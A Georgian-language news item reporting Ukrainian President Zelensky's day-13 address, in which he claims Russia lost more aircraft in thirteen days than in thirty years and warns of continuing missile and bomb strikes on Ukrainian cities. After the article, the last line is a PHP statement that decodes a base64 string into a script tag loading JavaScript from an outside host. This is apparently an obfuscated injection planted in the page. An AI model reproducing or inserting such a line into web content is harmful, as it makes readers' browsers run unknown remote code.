celsiusi
ავერსი საქკაბელი
რუსეთს ბოლო 30 წლის განმავლობაში არ დაუკარგავს იმდენი საავიაციო ტექნიკა, რამდენიც ამ 13 დღის განმავლობაში უკრაინაში დაკარგა, - ამის შესახებ უკრაინის პრეზიდენტმა ვოლოდიმირ ზელენსკიმ საკუთარ მიმართვაში განაცხადა.
 
„მეცამეტე დღეა ვიბრძვით. ოკუპანტებს ვანადგურებთ, სადაც შეგვიძლია, ყველგან. მაგრამ არის ცა, ასობით რუსული საკრუიზო რაკეტა. ოკუპანტების ასობით საბრძოლო თვითმფრინავი. ასობით ვერტმფრენი. დიახ, ჩვენ ვანადგურებთ. რუსეთს ბოლო 30 წლის განმავლობაში არ დაუკარგავს იმდენი საავიაციო ტექნიკა, რამდენიც ამ 13 დღის განმავლობაში უკრაინაში“, - განაცხადა პრეზიდენტმა.
 
თუმცა, მისი თქმით, რუსეთს ჯერ კიდევ აქვს "საკმარისი მკვლელობის მანქანები".
 
„ჯერ კიდევ აქვთ საკმარისი რაკეტები ტერორისთვის. ხუთას კილოგრამიანი ბომბები ჯერ კიდევ საკმარისად აქვთ, რომ ჩამოაგდონ ჩერნიგოვისა და კიევის თავზე, ოდესასა და ხარკოვზე, პოლტავასა და ჟიტომირზე, ათეულობით უკრაინის ქალაქზე, მილიონობით მშვიდობიან უკრაინელ მოქალაქეზე", - განაცხადა ზელენსკიმ.
1045
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");